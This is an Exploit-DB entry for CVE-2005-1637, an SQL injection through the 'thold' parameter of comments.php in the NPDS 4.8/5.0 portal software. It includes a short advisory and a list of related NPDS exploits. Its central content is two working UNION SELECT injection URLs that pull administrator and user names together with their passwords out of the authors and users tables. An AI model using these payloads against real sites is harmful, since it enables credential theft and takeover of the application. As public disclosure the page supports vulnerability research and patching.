Exploit

EDB-ID: 25671	Author: NoSP	Published: 2005-05-16
CVE: CVE-2005-1637	Type: Webapps	Platform: PHP
Aliases: N/A	Advisory/Source: Link	Tags: N/A
E-DB Verified:	Exploit: Download / View Raw	Vulnerable App: N/A

« Previous Exploit Next Exploit »

source: http://www.securityfocus.com/bid/13649/info

NPDS is prone to an SQL injection vulnerability.

This issue is due to a failure in the application to properly sanitize user-supplied input to the 'thold' parameter.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

All versions are considered to be vulnerable at the moment.


http://www.example.com/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors

http://www.example.com/npds/comments.php?thold =0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users

Related Exploits

Trying to match CVEs (1): CVE-2005-1637
Trying to match OSVDBs (1): 16648
Other Possible E-DB Search Terms: NPDS 4.8/5.0, NPDS 4.8, NPDS

Date	Title	Author
2006-06-12	NPDS 5.10 - Multiple Input Validation Vulnerabilities	DarkFig
2010-05-20	NPDS REvolution 10.02 - 'admin.php' Cross-Site Request Forgery	High-Tech B...
2010-05-18	NPDS REvolution 10.02 - 'download.php' Cross-Site Scripting	High-Tech B...
2010-05-13	NPDS REvolution 10.02 - 'download.php' SQL Injection	High-Tech B...
2010-05-13	NPDS REvolution 10.02 - 'topic' Parameter Cross-Site Scripting	High-Tech B...
2007-03-18	Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (1)	DarkFig
2007-05-04	Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2)	Gu1ll4um3r0...
2002-09-25	NPDS 4.8 - News Message HTML Injection	das@hush.com
2005-05-28	NPDS 4.8 < 5.0 - admin.php language Parameter Cross-Site Scripting	NoSP
2005-05-28	NPDS 4.8 < 5.0 - faq.php categories Parameter Cross-Site Scripting	NoSP
2005-05-28	NPDS 4.8 < 5.0 - Glossaire Module terme Parameter SQL Injection	NoSP
2005-05-28	NPDS 4.8 < 5.0 - links.php Query Parameter SQL Injection	NoSP
2005-05-28	NPDS 4.8 < 5.0 - powerpack_f.php language Parameter Cross-Site Scripting	NoSP
2005-05-28	NPDS 4.8 < 5.0 - reply.php image_subject Parameter Cross-Site Scripting	NoSP
2005-05-28	NPDS 4.8 < 5.0 - reviews.php title Parameter Cross-Site Scripting	NoSP
2005-05-28	NPDS 4.8 < 5.0 - sdv_infos.php sitename Parameter Cross-Site Scripting	NoSP
2005-05-16	NPDS 4.8/5.0 - pollcomments.php thold Parameter SQL Injection	NoSP
2015-01-24	NPDS CMS REvolution-13 - SQL Injection	Narendra Bhati
2005-05-28	NPDS 4.8 /5.0 - 'modules.php' Lettre Parameter Cross-Site Scripting	NoSP
2008-12-04	NPDS < 08.06 - Multiple Input Validation Vulnerabilities	Jean-Franço...

NPDS 4.8/5.0 - comments.php thold Parameter SQL Injection

Related Exploits